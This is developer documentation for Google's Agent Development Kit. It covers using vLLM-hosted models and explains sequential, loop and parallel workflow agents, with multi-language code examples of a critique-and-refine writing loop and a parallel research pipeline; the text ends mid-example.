Tools such as [vLLM](https://github.com/vllm-project/vllm) allow you to host models efficiently and serve them as an OpenAI-compatible API endpoint. You can use vLLM models through the [LiteLLM](/adk-docs/agents/models/litellm/) library for Python.

## Setup

1. **Deploy Model:** Deploy your chosen model using vLLM (or a similar tool). Note the API base URL (e.g., `https://your-vllm-endpoint.run.app/v1`).
    - *Important for ADK Tools:* When deploying, ensure the serving tool supports and enables OpenAI-compatible tool/function calling. For vLLM, this might involve flags like `--enable-auto-tool-choice` and potentially a specific `--tool-call-parser`, depending on the model. Refer to the vLLM documentation on Tool Use.
1. **Authentication:** Determine how your endpoint handles authentication (e.g., API key, bearer token).
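Once you know which scheme your endpoint uses, it can help to keep the credential handling in one small function. The sketch below is illustrative only: `build_auth_kwargs` is a hypothetical helper, not part of ADK or LiteLLM. The two keys it returns, `api_key` and `extra_headers`, mirror the `LiteLlm` arguments used in the integration example in this guide.

```python
def build_auth_kwargs(api_key=None, bearer_token=None):
    """Translate endpoint credentials into keyword arguments.

    Hypothetical helper: returns {"api_key": ...} for API-key endpoints,
    {"extra_headers": {...}} for bearer-token endpoints, and {} when the
    endpoint is unsecured.
    """
    if api_key and bearer_token:
        raise ValueError("Provide either api_key or bearer_token, not both.")
    if api_key:
        return {"api_key": api_key}
    if bearer_token:
        return {"extra_headers": {"Authorization": f"Bearer {bearer_token}"}}
    return {}


if __name__ == "__main__":
    # Example: a bearer token obtained from your identity provider.
    print(build_auth_kwargs(bearer_token="EXAMPLE_TOKEN"))
```

The returned dictionary could then be unpacked into the model wrapper's constructor, so the agent definition does not need to change when the authentication scheme does.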
## Integration Example

The following example shows how to use a vLLM endpoint with ADK agents.

```python
import subprocess
from google.adk.agents import LlmAgent
from google.adk.models.lite_llm import LiteLlm

# --- Example Agent using a model hosted on a vLLM endpoint ---

# Endpoint URL provided by your vLLM deployment
api_base_url = "https://your-vllm-endpoint.run.app/v1"

# Model name as recognized by *your* vLLM endpoint configuration
model_name_at_endpoint = "hosted_vllm/google/gemma-3-4b-it"  # Example from vllm_test.py

# Authentication (Example: using gcloud identity token for a Cloud Run deployment)
# Adapt this based on your endpoint's security
try:
    gcloud_token = subprocess.check_output(
        ["gcloud", "auth", "print-identity-token", "-q"]
    ).decode().strip()
    auth_headers = {"Authorization": f"Bearer {gcloud_token}"}
except Exception as e:
    print(f"Warning: Could not get gcloud token - {e}. Endpoint might be unsecured or require different auth.")
    auth_headers = None  # Or handle error appropriately

agent_vllm = LlmAgent(
    model=LiteLlm(
        model=model_name_at_endpoint,
        api_base=api_base_url,
        # Pass authentication headers if needed
        extra_headers=auth_headers
        # Alternatively, if endpoint uses an API key:
        # api_key="YOUR_ENDPOINT_API_KEY"
    ),
    name="vllm_agent",
    instruction="You are a helpful assistant running on a self-hosted vLLM endpoint.",
    # ... other agent parameters
)
```

# Workflow Agents

Supported in ADK: Python, TypeScript, Go, Java

This section introduces "*workflow agents*" - **specialized agents that control the execution flow of their sub-agents**.

Workflow agents are specialized components in ADK designed purely for **orchestrating the execution flow of sub-agents**. Their primary role is to manage *how* and *when* other agents run, defining the control flow of a process.
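To make the idea of deterministic orchestration concrete, here is a toy sketch in plain Python. It does not use ADK at all: the "sub-agents" are ordinary functions that mutate a shared dictionary, and `run_sequential`, `run_loop`, and the `stop` key are hypothetical names chosen for illustration. The point is only that the orchestrator decides order and repetition with fixed logic, whatever the steps themselves do.

```python
from typing import Callable, Dict, List

State = Dict[str, object]
Step = Callable[[State], None]  # toy stand-in for a sub-agent


def run_sequential(steps: List[Step], state: State) -> State:
    """Run each step once, in list order."""
    for step in steps:
        step(state)
    return state


def run_loop(steps: List[Step], state: State, max_iterations: int) -> int:
    """Repeat the steps until one sets state['stop'] or the cap is reached.

    Returns the number of passes that were started.
    """
    for iteration in range(1, max_iterations + 1):
        for step in steps:
            step(state)
            if state.get("stop"):
                return iteration
    return max_iterations


def write(state: State) -> None:
    # Pretend to refine a draft by appending to it.
    state["draft"] = str(state.get("draft", "")) + "x"


def critique(state: State) -> None:
    # Signal termination once the draft is "good enough".
    state["stop"] = len(str(state["draft"])) >= 3


if __name__ == "__main__":
    state: State = {}
    passes = run_loop([write, critique], state, max_iterations=5)
    print(passes, state["draft"])
```

In this sketch the loop ends on the third pass because `critique` sets the stop flag. With a smaller cap, the iteration limit would end it first.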
Unlike [LLM Agents](https://google.github.io/adk-docs/agents/llm-agents/index.md), which use Large Language Models for dynamic reasoning and decision-making, Workflow Agents operate based on **predefined logic**. They determine the execution sequence according to their type (e.g., sequential, parallel, loop) without consulting an LLM for the orchestration itself. This results in **deterministic and predictable execution patterns**. ADK provides three core workflow agent types, each implementing a distinct execution pattern: - **Sequential Agents** ______________________________________________________________________ Executes sub-agents one after another, in **sequence**. [Learn more](https://google.github.io/adk-docs/agents/workflow-agents/sequential-agents/index.md) - **Loop Agents** ______________________________________________________________________ **Repeatedly** executes its sub-agents until a specific termination condition is met. [Learn more](https://google.github.io/adk-docs/agents/workflow-agents/loop-agents/index.md) - **Parallel Agents** ______________________________________________________________________ Executes multiple sub-agents in **parallel**. [Learn more](https://google.github.io/adk-docs/agents/workflow-agents/parallel-agents/index.md) ## Why Use Workflow Agents? Workflow agents are essential when you need explicit control over how a series of tasks or agents are executed. They provide: - **Predictability:** The flow of execution is guaranteed based on the agent type and configuration. - **Reliability:** Ensures tasks run in the required order or pattern consistently. - **Structure:** Allows you to build complex processes by composing agents within clear control structures. While the workflow agent manages the control flow deterministically, the sub-agents it orchestrates can themselves be any type of agent, including intelligent LLM Agent instances. 
This allows you to combine structured process control with flexible, LLM-powered task execution.

# Loop agents

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.2.0

The `LoopAgent` is a workflow agent that executes its sub-agents in a loop (i.e., iteratively). It ***repeatedly runs* a sequence of agents** for a specified number of iterations or until a termination condition is met.

Use the `LoopAgent` when your workflow involves repetition or iterative refinement, such as revising code.

### Example

- You want to build an agent that generates images of food, but when you ask for a specific number of items (e.g., 5 bananas), the image sometimes contains a different number (e.g., 7 bananas). You have two tools: `Generate Image` and `Count Food Items`. Because you want to keep generating images until the image contains the requested number of items, or until a certain number of iterations has been reached, you should build your agent using a `LoopAgent`.

As with other [workflow agents](https://google.github.io/adk-docs/agents/workflow-agents/index.md), the `LoopAgent` is not powered by an LLM, and is thus deterministic in how it executes. That being said, workflow agents are only concerned with their execution, such as in a loop, and not their internal logic; the tools or sub-agents of a workflow agent may or may not utilize LLMs.

### How it Works

When the `LoopAgent`'s `Run Async` method is called, it performs the following actions:

1. **Sub-Agent Execution:** It iterates through the Sub Agents list *in order*. For *each* sub-agent, it calls the agent's `Run Async` method.

1. **Termination Check:** *Crucially*, the `LoopAgent` itself does *not* inherently decide when to stop looping. You *must* implement a termination mechanism to prevent infinite loops. Common strategies include:

   - **Max Iterations**: Set a maximum number of iterations in the `LoopAgent`. **The loop will terminate after that many iterations**.
   - **Escalation from sub-agent**: Design one or more sub-agents to evaluate a condition (e.g., "Is the document quality good enough?", "Has a consensus been reached?"). If the condition is met, the sub-agent signals termination by escalating. In the full example below, this is done by a tool that sets `escalate` to true on its tool context's actions.

### Full Example: Iterative Document Improvement

Imagine a scenario where you want to iteratively improve a document:

- **Writer Agent:** An `LlmAgent` that generates or refines a draft on a topic.
- **Critic Agent:** An `LlmAgent` that critiques the draft, identifying areas for improvement.

```py
LoopAgent(sub_agents=[WriterAgent, CriticAgent], max_iterations=5)
```

In this setup, the `LoopAgent` would manage the iterative process. The `CriticAgent` could be **designed to return a "STOP" signal when the document reaches a satisfactory quality level**, preventing further iterations. Alternatively, the `max_iterations` parameter could be used to limit the process to a fixed number of cycles, or external logic could be implemented to make stop decisions. The **loop would run at most five times**, ensuring the iterative refinement doesn't continue indefinitely.

Full Code

````py
from google.adk.agents import LoopAgent, LlmAgent, SequentialAgent
from google.adk.tools.tool_context import ToolContext
from google.adk.agents.callback_context import CallbackContext

# --- Constants ---
GEMINI_MODEL = "gemini-2.5-flash"

# --- State Keys ---
STATE_CURRENT_DOC = "current_document"
STATE_CRITICISM = "criticism"
# Define the exact phrase the Critic should use to signal completion
COMPLETION_PHRASE = "No major issues found."

# --- Tool Definition ---
def exit_loop(tool_context: ToolContext):
    """Call this function ONLY when the critique indicates no further changes are needed, signaling the iterative process should end."""
    print(f" [Tool Call] exit_loop triggered by {tool_context.agent_name}")
    tool_context.actions.escalate = True
    tool_context.actions.skip_summarization = True
    # Return empty dict as tools should typically return JSON-serializable output
    return {}

# --- Before Agent Callback ---
def update_initial_topic_state(callback_context: CallbackContext):
    """Ensure 'initial_topic' is set in state before pipeline starts."""
    callback_context.state['initial_topic'] = callback_context.state.get('initial_topic', 'a robot developing unexpected emotions')

# --- Agent Definitions ---

# STEP 1: Initial Writer Agent (Runs ONCE at the beginning)
initial_writer_agent = LlmAgent(
    name="InitialWriterAgent",
    model=GEMINI_MODEL,
    include_contents='none',
    instruction=f"""
    You are a Creative Writing Assistant tasked with starting a story.
    Write a *very basic* first draft of a short story (just 1-2 simple sentences).
    Keep it plain and minimal - do NOT add descriptive language yet.
    Topic: {{initial_topic}}

    Output *only* the story/document text. Do not add introductions or explanations.
    """,
    description="Writes the initial document draft based on the topic, aiming for some initial substance.",
    output_key=STATE_CURRENT_DOC
)

# STEP 2a: Critic Agent (Inside the Refinement Loop)
critic_agent_in_loop = LlmAgent(
    name="CriticAgent",
    model=GEMINI_MODEL,
    include_contents='none',
    instruction=f"""
    You are a Constructive Critic AI reviewing a short story draft.

    **Document to Review:**
    ```
    {{current_document}}
    ```

    **Completion Criteria (ALL must be met):**
    1. At least 4 sentences long
    2. Has a clear beginning, middle, and end
    3. Includes at least one descriptive detail (sensory or emotional)

    **Task:**
    Check the document against the criteria above.

    IF any criterion is NOT met, provide specific feedback on what to add or improve.
    Output *only* the critique text.

    IF ALL criteria are met, respond *exactly* with: "{COMPLETION_PHRASE}"
    """,
    description="Reviews the current draft, providing critique if clear improvements are needed, otherwise signals completion.",
    output_key=STATE_CRITICISM
)

# STEP 2b: Refiner/Exiter Agent (Inside the Refinement Loop)
refiner_agent_in_loop = LlmAgent(
    name="RefinerAgent",
    model=GEMINI_MODEL,
    # Relies solely on state via placeholders
    include_contents='none',
    instruction=f"""
    You are a Creative Writing Assistant refining a document based on feedback OR exiting the process.

    **Current Document:**
    ```
    {{current_document}}
    ```

    **Critique/Suggestions:**
    {{criticism}}

    **Task:**
    Analyze the 'Critique/Suggestions'.
    IF the critique is *exactly* "{COMPLETION_PHRASE}":
    You MUST call the 'exit_loop' function. Do not output any text.
    ELSE (the critique contains actionable feedback):
    Carefully apply the suggestions to improve the 'Current Document'. Output *only* the refined document text.

    Do not add explanations. Either output the refined document OR call the exit_loop function.
    """,
    description="Refines the document based on critique, or calls exit_loop if critique indicates completion.",
    tools=[exit_loop],  # Provide the exit_loop tool
    output_key=STATE_CURRENT_DOC  # Overwrites state['current_document'] with the refined version
)

# STEP 2: Refinement Loop Agent
refinement_loop = LoopAgent(
    name="RefinementLoop",
    # Agent order is crucial: Critique first, then Refine/Exit
    sub_agents=[
        critic_agent_in_loop,
        refiner_agent_in_loop,
    ],
    max_iterations=5  # Limit loops
)

# STEP 3: Overall Sequential Pipeline
# For ADK tools compatibility, the root agent must be named `root_agent`
root_agent = SequentialAgent(
    name="IterativeWritingPipeline",
    sub_agents=[
        initial_writer_agent,  # Run first to create initial doc
        refinement_loop  # Then run the critique/refine loop
    ],
    before_agent_callback=update_initial_topic_state,  # set initial topic in state
    description="Writes an initial document and then iteratively refines it with critique using an exit tool."
)
````

```typescript
// Part of agent.ts --> Follow https://google.github.io/adk-docs/get-started/quickstart/ to learn the setup
import { LoopAgent, LlmAgent, SequentialAgent, FunctionTool } from '@google/adk';
import { z } from 'zod';

// --- Constants ---
const GEMINI_MODEL = "gemini-2.5-flash";
const STATE_INITIAL_TOPIC = "initial_topic";

// --- State Keys ---
const STATE_CURRENT_DOC = "current_document";
const STATE_CRITICISM = "criticism";
// Define the exact phrase the Critic should use to signal completion
const COMPLETION_PHRASE = "No major issues found.";

// --- Tool Definition ---
const exitLoopTool = new FunctionTool({
  name: 'exit_loop',
  description: 'Call this function ONLY when the critique indicates no further changes are needed, signaling the iterative process should end.',
  parameters: z.object({}),
  execute: (input, toolContext) => {
    if (toolContext) {
      console.log(` [Tool Call] exit_loop triggered by ${toolContext.agentName} with input: ${input}`);
      toolContext.actions.escalate = true;
    }
    return {};
  },
});

// --- Agent Definitions ---

// STEP 1: Initial Writer Agent (Runs ONCE at the beginning)
const initialWriterAgent = new LlmAgent({
  name: "InitialWriterAgent",
  model: GEMINI_MODEL,
  includeContents: 'none',
  // MODIFIED Instruction: Ask for a slightly more developed start
  instruction: `You are a Creative Writing Assistant tasked with starting a story.
    Write the *first draft* of a short story (aim for 2-4 sentences).
    Base the content *only* on the topic provided below. Try to introduce a specific element (like a character, a setting detail, or a starting action) to make it engaging.
    Topic: {{${STATE_INITIAL_TOPIC}}}

    Output *only* the story/document text. Do not add introductions or explanations.
`,
  description: "Writes the initial document draft based on the topic, aiming for some initial substance.",
  outputKey: STATE_CURRENT_DOC
});

// STEP 2a: Critic Agent (Inside the Refinement Loop)
const criticAgentInLoop = new LlmAgent({
  name: "CriticAgent",
  model: GEMINI_MODEL,
  includeContents: 'none',
  // MODIFIED Instruction: More nuanced completion criteria, look for clear improvement paths.
  instruction: `You are a Constructive Critic AI reviewing a short document draft (typically 2-6 sentences). Your goal is balanced feedback.

    **Document to Review:**
    {{current_document}}

    **Task:**
    Review the document for clarity, engagement, and basic coherence according to the initial topic (if known).

    IF you identify 1-2 *clear and actionable* ways the document could be improved to better capture the topic or enhance reader engagement (e.g., "Needs a stronger opening sentence", "Clarify the character's goal"):
    Provide these specific suggestions concisely. Output *only* the critique text.

    ELSE IF the document is coherent, addresses the topic adequately for its length, and has no glaring errors or obvious omissions:
    Respond *exactly* with the phrase "${COMPLETION_PHRASE}" and nothing else. It doesn't need to be perfect, just functionally complete for this stage.
    Avoid suggesting purely subjective stylistic preferences if the core is sound.

    Do not add explanations. Output only the critique OR the exact completion.
`,
  description: "Reviews the current draft, providing critique if clear improvements are needed, otherwise signals completion.",
  outputKey: STATE_CRITICISM
});

// STEP 2b: Refiner/Exiter Agent (Inside the Refinement Loop)
const refinerAgentInLoop = new LlmAgent({
  name: "RefinerAgent",
  model: GEMINI_MODEL,
  // Relies solely on state via placeholders
  includeContents: 'none',
  instruction: `You are a Creative Writing Assistant refining a document based on feedback OR exiting the process.

    **Current Document:**
    {{current_document}}

    **Critique/Suggestions:**
    {{criticism}}

    **Task:**
    Analyze the 'Critique/Suggestions'.
    IF the critique is *exactly* "${COMPLETION_PHRASE}":
    You MUST call the 'exit_loop' function. Do not output any text.
    ELSE (the critique contains actionable feedback):
    Carefully apply the suggestions to improve the 'Current Document'. Output *only* the refined document text.

    Do not add explanations. Either output the refined document OR call the exit_loop function.
`,
  tools: [exitLoopTool],
  description: "Refines the document based on critique, or calls exit_loop if critique indicates completion.",
  outputKey: STATE_CURRENT_DOC
});

// STEP 2: Refinement Loop Agent
const refinementLoop = new LoopAgent({
  name: "RefinementLoop",
  // Agent order is crucial: Critique first, then Refine/Exit
  subAgents: [
    criticAgentInLoop,
    refinerAgentInLoop,
  ],
  maxIterations: 5 // Limit loops
});

// STEP 3: Overall Sequential Pipeline
// For ADK tools compatibility, the root agent must be named `root_agent`
export const rootAgent = new SequentialAgent({
  name: "IterativeWritingPipeline",
  subAgents: [
    initialWriterAgent, // Run first to create initial doc
    refinementLoop // Then run the critique/refine loop
  ],
  description: "Writes an initial document and then iteratively refines it with critique using an exit tool."
});
```

```go
// ExitLoopArgs defines the (empty) arguments for the ExitLoop tool.
type ExitLoopArgs struct{}

// ExitLoopResults defines the output of the ExitLoop tool.
type ExitLoopResults struct{}

// ExitLoop is a tool that signals the loop to terminate by setting Escalate to true.
func ExitLoop(ctx tool.Context, input ExitLoopArgs) (ExitLoopResults, error) {
	fmt.Printf("[Tool Call] exitLoop triggered by %s \n", ctx.AgentName())
	ctx.Actions().Escalate = true
	return ExitLoopResults{}, nil
}

func main() {
	ctx := context.Background()

	if err := runAgent(ctx, "Write a document about a cat"); err != nil {
		log.Fatalf("Agent execution failed: %v", err)
	}
}

func runAgent(ctx context.Context, prompt string) error {
	model, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{})
	if err != nil {
		return fmt.Errorf("failed to create model: %v", err)
	}

	// STEP 1: Initial Writer Agent (Runs ONCE at the beginning)
	initialWriterAgent, err := llmagent.New(llmagent.Config{
		Name:        "InitialWriterAgent",
		Model:       model,
		Description: "Writes the initial document draft based on the topic.",
		Instruction: `You are a Creative Writing Assistant tasked with starting a story.
Write the *first draft* of a short story (aim for 2-4 sentences).
Base the content *only* on the topic provided in the user's prompt.
Output *only* the story/document text. Do not add introductions or explanations.`,
		OutputKey: stateDoc,
	})
	if err != nil {
		return fmt.Errorf("failed to create initial writer agent: %v", err)
	}

	// STEP 2a: Critic Agent (Inside the Refinement Loop)
	criticAgentInLoop, err := llmagent.New(llmagent.Config{
		Name:        "CriticAgent",
		Model:       model,
		Description: "Reviews the current draft, providing critique or signaling completion.",
		Instruction: fmt.Sprintf(`You are a Constructive Critic AI reviewing a short document draft.
**Document to Review:**
"""
{%s}
"""
**Task:**
Review the document.
IF you identify 1-2 *clear and actionable* ways it could be improved:
Provide these specific suggestions concisely. Output *only* the critique text.
ELSE IF the document is coherent and addresses the topic adequately:
Respond *exactly* with the phrase "%s" and nothing else.`, stateDoc, donePhrase),
		OutputKey: stateCrit,
	})
	if err != nil {
		return fmt.Errorf("failed to create critic agent: %v", err)
	}

	exitLoopTool, err := functiontool.New(
		functiontool.Config{
			Name:        "exitLoop",
			Description: "Call this function ONLY when the critique indicates no further changes are needed.",
		},
		ExitLoop,
	)
	if err != nil {
		return fmt.Errorf("failed to create exit loop tool: %v", err)
	}

	// STEP 2b: Refiner/Exiter Agent (Inside the Refinement Loop)
	refinerAgentInLoop, err := llmagent.New(llmagent.Config{
		Name:  "RefinerAgent",
		Model: model,
		Instruction: fmt.Sprintf(`You are a Creative Writing Assistant refining a document based on feedback OR exiting the process.
**Current Document:**
"""
{%s}
"""
**Critique/Suggestions:**
{%s}
**Task:**
Analyze the 'Critique/Suggestions'.
IF the critique is *exactly* "%s":
You MUST call the 'exitLoop' function. Do not output any text.
ELSE (the critique contains actionable feedback):
Carefully apply the suggestions to improve the 'Current Document'.
Output *only* the refined document text.`, stateDoc, stateCrit, donePhrase),
		Description: "Refines the document based on critique, or calls exitLoop if critique indicates completion.",
		Tools:       []tool.Tool{exitLoopTool},
		OutputKey:   stateDoc,
	})
	if err != nil {
		return fmt.Errorf("failed to create refiner agent: %v", err)
	}

	// STEP 2: Refinement Loop Agent
	refinementLoop, err := loopagent.New(loopagent.Config{
		AgentConfig: agent.Config{
			Name:      "RefinementLoop",
			SubAgents: []agent.Agent{criticAgentInLoop, refinerAgentInLoop},
		},
		MaxIterations: 5,
	})
	if err != nil {
		return fmt.Errorf("failed to create loop agent: %v", err)
	}

	// STEP 3: Overall Sequential Pipeline
	iterativeWriterAgent, err := sequentialagent.New(sequentialagent.Config{
		AgentConfig: agent.Config{
			Name:      appName,
			SubAgents: []agent.Agent{initialWriterAgent, refinementLoop},
		},
	})
	if err != nil {
		return fmt.Errorf("failed to create sequential agent pipeline: %v", err)
	}
```

````java
import static com.google.adk.agents.LlmAgent.IncludeContents.NONE;

import com.google.adk.agents.LlmAgent;
import com.google.adk.agents.LoopAgent;
import com.google.adk.agents.SequentialAgent;
import com.google.adk.events.Event;
import com.google.adk.runner.InMemoryRunner;
import com.google.adk.sessions.Session;
import com.google.adk.tools.Annotations.Schema;
import com.google.adk.tools.FunctionTool;
import com.google.adk.tools.ToolContext;
import com.google.genai.types.Content;
import com.google.genai.types.Part;
import io.reactivex.rxjava3.core.Flowable;
import java.util.Map;

public class LoopAgentExample {

  // --- Constants ---
  private static final String APP_NAME = "IterativeWritingPipeline";
  private static final String USER_ID = "test_user_456";
  private static final String MODEL_NAME = "gemini-2.0-flash";

  // --- State Keys ---
  private static final String STATE_CURRENT_DOC = "current_document";
  private static final String STATE_CRITICISM = "criticism";

  public static void main(String[] args) {
    LoopAgentExample loopAgentExample =
        new LoopAgentExample();
    loopAgentExample.runAgent("Write a document about a cat");
  }

  // --- Tool Definition ---
  @Schema(
      description =
          "Call this function ONLY when the critique indicates no further changes are needed,"
              + " signaling the iterative process should end.")
  public static Map<String, Object> exitLoop(@Schema(name = "toolContext") ToolContext toolContext) {
    System.out.printf("[Tool Call] exitLoop triggered by %s \n", toolContext.agentName());
    toolContext.actions().setEscalate(true);
    // Return an empty map, as tools should typically return JSON-serializable output
    return Map.of();
  }

  // --- Agent Definitions ---
  public void runAgent(String prompt) {
    // STEP 1: Initial Writer Agent (Runs ONCE at the beginning)
    LlmAgent initialWriterAgent =
        LlmAgent.builder()
            .model(MODEL_NAME)
            .name("InitialWriterAgent")
            .description(
                "Writes the initial document draft based on the topic, aiming for some initial"
                    + " substance.")
            .instruction(
                """
                    You are a Creative Writing Assistant tasked with starting a story.
                    Write the *first draft* of a short story (aim for 2-4 sentences).
                    Base the content *only* on the topic provided below. Try to introduce a specific element (like a character, a setting detail, or a starting action) to make it engaging.

                    Output *only* the story/document text. Do not add introductions or explanations.
                    """)
            .outputKey(STATE_CURRENT_DOC)
            .includeContents(NONE)
            .build();

    // STEP 2a: Critic Agent (Inside the Refinement Loop)
    LlmAgent criticAgentInLoop =
        LlmAgent.builder()
            .model(MODEL_NAME)
            .name("CriticAgent")
            .description(
                "Reviews the current draft, providing critique if clear improvements are needed,"
                    + " otherwise signals completion.")
            .instruction(
                """
                    You are a Constructive Critic AI reviewing a short document draft (typically 2-6 sentences). Your goal is balanced feedback.

                    **Document to Review:**
                    ```
                    {{current_document}}
                    ```

                    **Task:**
                    Review the document for clarity, engagement, and basic coherence according to the initial topic (if known).

                    IF you identify 1-2 *clear and actionable* ways the document could be improved to better capture the topic or enhance reader engagement (e.g., "Needs a stronger opening sentence", "Clarify the character's goal"):
                    Provide these specific suggestions concisely. Output *only* the critique text.

                    ELSE IF the document is coherent, addresses the topic adequately for its length, and has no glaring errors or obvious omissions:
                    Respond *exactly* with the phrase "No major issues found." and nothing else. It doesn't need to be perfect, just functionally complete for this stage. Avoid suggesting purely subjective stylistic preferences if the core is sound.

                    Do not add explanations. Output only the critique OR the exact completion phrase.
                    """)
            .outputKey(STATE_CRITICISM)
            .includeContents(NONE)
            .build();

    // STEP 2b: Refiner/Exiter Agent (Inside the Refinement Loop)
    LlmAgent refinerAgentInLoop =
        LlmAgent.builder()
            .model(MODEL_NAME)
            .name("RefinerAgent")
            .description(
                "Refines the document based on critique, or calls exitLoop if critique indicates"
                    + " completion.")
            .instruction(
                """
                    You are a Creative Writing Assistant refining a document based on feedback OR exiting the process.

                    **Current Document:**
                    ```
                    {{current_document}}
                    ```

                    **Critique/Suggestions:**
                    {{criticism}}

                    **Task:**
                    Analyze the 'Critique/Suggestions'.
                    IF the critique is *exactly* "No major issues found.":
                    You MUST call the 'exitLoop' function. Do not output any text.
                    ELSE (the critique contains actionable feedback):
                    Carefully apply the suggestions to improve the 'Current Document'. Output *only* the refined document text.

                    Do not add explanations. Either output the refined document OR call the exitLoop function.
                    """)
            .outputKey(STATE_CURRENT_DOC)
            .includeContents(NONE)
            .tools(FunctionTool.create(LoopAgentExample.class, "exitLoop"))
            .build();

    // STEP 2: Refinement Loop Agent
    LoopAgent refinementLoop =
        LoopAgent.builder()
            .name("RefinementLoop")
            .description("Repeatedly refines the document with critique and then exits.")
            .subAgents(criticAgentInLoop, refinerAgentInLoop)
            .maxIterations(5)
            .build();

    // STEP 3: Overall Sequential Pipeline
    SequentialAgent iterativeWriterAgent =
        SequentialAgent.builder()
            .name(APP_NAME)
            .description(
                "Writes an initial document and then iteratively refines it with critique using an"
                    + " exit tool.")
            .subAgents(initialWriterAgent, refinementLoop)
            .build();

    // Create an InMemoryRunner
    InMemoryRunner runner = new InMemoryRunner(iterativeWriterAgent, APP_NAME);
    // InMemoryRunner automatically creates a session service. Create a session using the service
    Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet();
    Content userMessage = Content.fromParts(Part.fromText(prompt));

    // Run the agent
    Flowable<Event> eventStream = runner.runAsync(USER_ID, session.id(), userMessage);

    // Stream event response
    eventStream.blockingForEach(
        event -> {
          if (event.finalResponse()) {
            System.out.println(event.stringifyContent());
          }
        });
  }
}
````

# Parallel agents

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.2.0

The `ParallelAgent` is a [workflow agent](https://google.github.io/adk-docs/agents/workflow-agents/index.md) that executes its sub-agents *concurrently*. This can dramatically speed up workflows where tasks can be performed independently.

Use `ParallelAgent` for scenarios that prioritize speed and involve independent, resource-intensive tasks. **When sub-agents operate without dependencies, their tasks can be performed concurrently**, significantly reducing overall processing time.
As with other [workflow agents](https://google.github.io/adk-docs/agents/workflow-agents/index.md), the `ParallelAgent` is not powered by an LLM, and is thus deterministic in how it executes. That being said, workflow agents are only concerned with their execution (i.e., executing sub-agents in parallel), and not their internal logic; the tools or sub-agents of a workflow agent may or may not utilize LLMs.

### Example

This approach is particularly beneficial for operations like multi-source data retrieval or heavy computations, where parallelization yields substantial performance gains. Importantly, this strategy assumes no inherent need for shared state or direct information exchange between the concurrently executing agents.

### How it works

When the `ParallelAgent`'s `run_async()` method is called:

1. **Concurrent Execution:** It initiates the `run_async()` method of *each* sub-agent present in the `sub_agents` list *concurrently*. This means all the agents start running at (approximately) the same time.
1. **Independent Branches:** Each sub-agent operates in its own execution branch. There is ***no* automatic sharing of conversation history or state between these branches** during execution.
1. **Result Collection:** The `ParallelAgent` manages the parallel execution and, typically, provides a way to access the results from each sub-agent after they have completed (e.g., through a list of results or events). The order of results may not be deterministic.

### Independent Execution and State Management

It's *crucial* to understand that sub-agents within a `ParallelAgent` run independently. If you *need* communication or data sharing between these agents, you must implement it explicitly. Possible approaches include:

- **Shared `InvocationContext`:** You could pass a shared `InvocationContext` object to each sub-agent. This object could act as a shared data store.
  However, you'd need to manage concurrent access to this shared context carefully (e.g., using locks) to avoid race conditions.
- **External State Management:** Use an external database, message queue, or other mechanism to manage shared state and facilitate communication between agents.
- **Post-Processing:** Collect results from each branch, and then implement logic to coordinate data afterwards.

### Full Example: Parallel Web Research

Imagine researching multiple topics simultaneously:

1. **Researcher Agent 1:** An `LlmAgent` that researches "renewable energy sources."
1. **Researcher Agent 2:** An `LlmAgent` that researches "electric vehicle technology."
1. **Researcher Agent 3:** An `LlmAgent` that researches "carbon capture methods."

```py
ParallelAgent(sub_agents=[ResearcherAgent1, ResearcherAgent2, ResearcherAgent3])
```

These research tasks are independent. Using a `ParallelAgent` allows them to run concurrently, potentially reducing the total research time significantly compared to running them sequentially. The results from each agent would be collected separately after they finish.

Full Code

```py
from google.adk.agents.parallel_agent import ParallelAgent
from google.adk.agents.llm_agent import LlmAgent
from google.adk.agents.sequential_agent import SequentialAgent
from google.adk.tools import google_search

# --- Constants ---
GEMINI_MODEL = "gemini-2.5-flash"

# --- 1. Define Researcher Sub-Agents (to run in parallel) ---

# Researcher 1: Renewable Energy
researcher_agent_1 = LlmAgent(
    name="RenewableEnergyResearcher",
    model=GEMINI_MODEL,
    instruction="""You are an AI Research Assistant specializing in energy.
Research the latest advancements in 'renewable energy sources'.
Use the Google Search tool provided.
Summarize your key findings concisely (1-2 sentences).
Output *only* the summary.
""",
    description="Researches renewable energy sources.",
    tools=[google_search],
    # Store result in state for the merger agent
    output_key="renewable_energy_result"
)

# Researcher 2: Electric Vehicles
researcher_agent_2 = LlmAgent(
    name="EVResearcher",
    model=GEMINI_MODEL,
    instruction="""You are an AI Research Assistant specializing in transportation.
Research the latest developments in 'electric vehicle technology'.
Use the Google Search tool provided.
Summarize your key findings concisely (1-2 sentences).
Output *only* the summary.
""",
    description="Researches electric vehicle technology.",
    tools=[google_search],
    # Store result in state for the merger agent
    output_key="ev_technology_result"
)

# Researcher 3: Carbon Capture
researcher_agent_3 = LlmAgent(
    name="CarbonCaptureResearcher",
    model=GEMINI_MODEL,
    instruction="""You are an AI Research Assistant specializing in climate solutions.
Research the current state of 'carbon capture methods'.
Use the Google Search tool provided.
Summarize your key findings concisely (1-2 sentences).
Output *only* the summary.
""",
    description="Researches carbon capture methods.",
    tools=[google_search],
    # Store result in state for the merger agent
    output_key="carbon_capture_result"
)

# --- 2. Create the ParallelAgent (Runs researchers concurrently) ---
# This agent orchestrates the concurrent execution of the researchers.
# It finishes once all researchers have completed and stored their results in state.
parallel_research_agent = ParallelAgent(
    name="ParallelWebResearchAgent",
    sub_agents=[researcher_agent_1, researcher_agent_2, researcher_agent_3],
    description="Runs multiple research agents in parallel to gather information."
)

# --- 3. Define the Merger Agent (Runs *after* the parallel agents) ---
# This agent takes the results stored in the session state by the parallel agents
# and synthesizes them into a single, structured response with attributions.
merger_agent = LlmAgent(
    name="SynthesisAgent",
    model=GEMINI_MODEL,  # Or potentially a more powerful model if needed for synthesis
    instruction="""You are an AI Assistant responsible for combining research findings into a structured report.

Your primary task is to synthesize the following research summaries, clearly attributing findings to their source areas. Structure your response using headings for each topic. Ensure the report is coherent and integrates the key points smoothly.

**Crucially: Your entire response MUST be grounded *exclusively* on the information provided in the 'Input Summaries' below. Do NOT add any external knowledge, facts, or details not present in these specific summaries.**

**Input Summaries:**

*   **Renewable Energy:**
    {renewable_energy_result}

*   **Electric Vehicles:**
    {ev_technology_result}

*   **Carbon Capture:**
    {carbon_capture_result}

**Output Format:**

## Summary of Recent Sustainable Technology Advancements

### Renewable Energy Findings
